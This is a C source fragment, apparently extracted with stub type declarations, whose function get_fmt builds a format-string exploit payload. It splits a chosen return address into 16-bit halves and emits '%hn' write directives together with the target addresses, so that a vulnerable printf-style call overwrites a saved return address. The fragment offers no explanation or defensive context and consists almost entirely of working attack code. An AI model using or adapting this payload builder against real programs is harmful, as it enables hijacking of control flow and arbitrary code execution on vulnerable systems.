
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef scalar_t__ ulong ;
typedef int u_short ;
typedef scalar_t__ u_int ;
typedef int retloc ;
struct TYPE_3__ {int parms_base; size_t align; int retaddr; scalar_t__ retloc; } ;
typedef TYPE_1__ args ;


 scalar_t__ SLOP ;
 int die (char*) ;
 int fprintf (int ,char*,int,int) ;
 int memset (char*,char,size_t) ;
 int sprintf (char*,char*,char*,int,int,int,int,int,int) ;
 int stderr ;
 int strcat (char*,char*) ;
 int strlen (char*) ;

void get_fmt(args * argp, char *fb)
{
    u_short high, low;
    ulong retloc = argp->retloc, slop = 0;
    int dummy = argp->parms_base, len = 0;


    slop = SLOP + argp->align;


    low = (argp->retaddr & 0xffff);
    high = argp->retaddr >> 16;


    if (low > high)
 high += (0x10000 - low);
    else if (high > low)
 high -= low;
    else if (high == low) {
 fprintf(stderr, "Can't encode a NULL high retaddr, bailing\n"
  "high = %hx\tlow = %hx\n", high, low);
 die("adsf");
    }

    low -= slop;


    memset(fb, 'A', argp->align);
    fb[argp->align] = 0;





    sprintf(fb,

     "%s" "%%%d$*%d$u" "%%%d$hn" "%%%d$*%d$u" "%%%d$hn",
     fb, dummy, dummy + 3, dummy + 1, dummy, dummy + 4, dummy + 2);


    strcat(fb, "1111");
    len = strlen(fb);
    *(u_int *) (fb + len) = retloc;
    len += sizeof(retloc);
    *(u_int *) (fb + len) = retloc + 2;
    len += sizeof(retloc);
    *(u_short *) (fb + len) = low;
    *(u_short *) (fb + len + 2) = 0x0101;
    len += sizeof(retloc);
    *(u_short *) (fb + len) = high;
    *(u_short *) (fb + len + 2) = 0x0101;
    len += sizeof(retloc);

    fb[len] = 0;
}
